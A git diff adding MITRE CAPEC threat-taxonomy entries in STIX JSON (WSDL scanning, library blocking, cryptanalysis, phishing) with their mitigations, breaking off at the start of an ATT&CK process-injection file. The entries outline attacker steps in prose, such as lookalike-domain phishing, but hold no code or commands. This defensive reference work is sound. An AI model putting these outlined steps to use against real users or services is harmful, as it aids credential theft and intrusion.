+ "id": "relationship--cbfe5c41-f0ba-4524-aeaa-5d46d305a1a7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. 
In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. 
As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "It is important to protect WSDL file or provide limited access to it.", + "id": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eca4d328-57ff-446e-ad42-ccc2cef859ec", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2cfb5b02-2dbe-4bbb-93b6-d0829c53a835", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). 
Make sure that none of them is vulnerable to injection.", + "id": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c5539c8-19a6-45b2-bcb9-4fb404dc382b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dfec85-61f1-4800-8246-6586b0f18405", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.", + "id": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b13c359-babb-4e00-bfc7-ea8f84451bfe", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60133447-62bd-43b7-a58c-27e99dacd061", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.", + "id": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a99d577-7a8d-4c25-a919-00e88b344543", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7744ac94-d428-48ef-9b81-ccac789d7e79", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate the received messages against the WSDL Schema. 
Incomplete solution.", + "id": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-95-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8c83203-1d4b-4007-9bfc-d9e5e4cd1040", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36790523-1c9a-42c0-97ff-726d74a27ad4", + "spec_version": "2.1", + "target_ref": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. 
Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.", + "external_references": [ + { + "external_id": "CAPEC-96", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-589", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/589.html" + } + ], + "id": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Block Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Alter Execution Logic" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account." 
+ ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine what external libraries the application accesses.

Experiment

  1. Block access to the external libraries accessed by the application.

  2. Monitor the behavior of the system to see if it goes into an insecure/inconsistent state.

  3. If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application requires access to external libraries.", + "An attacker has the privileges to block application access to external libraries." + ], + "x_capec_skills_required": { + "Low": "Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.", + "id": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-96-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--348327f8-a11a-4875-acca-449bc953ceb1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e537380d-e149-4eca-9d47-bb2f507a166b", + "spec_version": "2.1", + "target_ref": "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these 
weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).", + "external_references": [ + { + "external_id": "CAPEC-97", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + }, + { + "external_id": "CWE-1240", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1240.html" + }, + { + "external_id": "CWE-1241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1241.html" + }, + { + "external_id": "CWE-1279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1279.html" + }, + { + "description": "Cryptanalysis", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cryptanalysis" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-556", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Cryptanalysis" + } + ], + "id": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cryptanalysis", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--30b081a0-bf20-432b-8211-a340bbd04731" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (In most cases, if cryptanalysis is successful at all, an adversary will not be able to decrypt the entire message, but instead will only be able to deduce some information about the plaintext. However, that may be sufficient for an adversary, depending on the context of the attack.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_example_instances": [ + "A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter \"E\" in an English language occurs with a certain known frequency (about 12.7%), whatever \"E\" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. 
Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext.

Exploit

  1. An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8" + ], + "x_capec_prerequisites": [ + "The target software utilizes some sort of cryptographic algorithm.", + "An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.", + "The encryption algorithm is known to the attacker.", + "An attacker has access to the ciphertext." + ], + "x_capec_resources_required": [ + "Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required." + ], + "x_capec_skills_required": { + "High": "Cryptanalysis generally requires a very significant level of understanding of mathematics and computation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use proven cryptographic algorithms with recommended key sizes.", + "id": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abc4a679-2285-4f45-82cd-1109211ab070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "spec_version": "2.1", + 
"target_ref": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Ensure that the algorithms are used properly. That means:\n \n 1. Not rolling out your own crypto; Use proven algorithms and implementations.\n 2. Choosing initialization vectors with sufficiently random numbers\n 3. Generating key material using good sources of randomness and avoiding known weak keys\n 4. Using proven protocols and their implementations.\n 5. Picking the most appropriate cryptographic algorithm for your usage context and data\n \n ", + "id": "course-of-action--fa27b1a5-bd89-4f29-ba4b-288f3f7cd461", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56815f59-a73c-4405-9d0b-994baee3c08c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa27b1a5-bd89-4f29-ba4b-288f3f7cd461", + "spec_version": "2.1", + "target_ref": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can 
later be used by an attacker. Phishing is essentially a form of information gathering or \"fishing\" for information.", + "external_references": [ + { + "external_id": "CAPEC-98", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/98.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Phishing", + "external_id": "T1566", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566" + }, + { + "description": "Phishing for Information", + "external_id": "T1598", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598" + }, + { + "description": "Wireless Security - Bluejack a Victim, TutorialsPoint", + "external_id": "REF-656", + "source_name": "reference_from_CAPEC", + "url": "https://www.tutorialspoint.com/wireless_security/wireless_security_bluejack_a_victim.htm" + } + ], + "id": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + 
"Social Engineering" + ], + "x_capec_example_instances": [ + "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An attacker has just collected the target's online banking information which can now be used by the attacker to log into the target's bank account and transfer money to a bank account of the attackers' choice.", + "An adversary may use BlueJacking, or Bluetooth Phishing to send unsolicited contact cards, messages, or pictures to nearby devices that are listening via Bluetooth. These messages may contain phishing content." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

  2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.
  3. Explore legitimate website and create duplicate: An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

  4. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to enter sensitive information on attacker's site.: An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

  2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.
  3. Use stolen credentials to log into legitimate site: Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

  4. Techniques
    Log in to the legitimate site using another user's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--614cd894-0aa6-4031-88e1-89bd7b6118bb", + "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0" + ], + "x_capec_prerequisites": [ + "An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.", + "An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.", + "The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Some web development tools to put up a fake website." + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c786816-7b0c-4fe7-b657-7e339aea5498", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8cee0cf-4567-40f0-a8d6-0b1d71c03c27", + "spec_version": "2.1", + "target_ref": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-99", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/99.html" + } + ], + "id": "attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Parser Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298.json new file mode 100644 index 0000000000000000000000000000000000000000..75417f214ae04bc03bd5f9ca2bfc027e795146de --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298.json 
@@ -0,0 +1,88 @@ +{ + "type": "bundle", + "id": "bundle--523a330b-0eba-42b3-93ab-f78c4e2d90b9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "type": "attack-pattern", + "created": "2020-01-14T17:18:32.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1055.011", + "url": "https://attack.mitre.org/techniques/T1055/011" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx", + "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", + "source_name": "Microsoft Window Classes" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx", + "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", + "source_name": "Microsoft GetWindowLong function" + }, + { + "url": 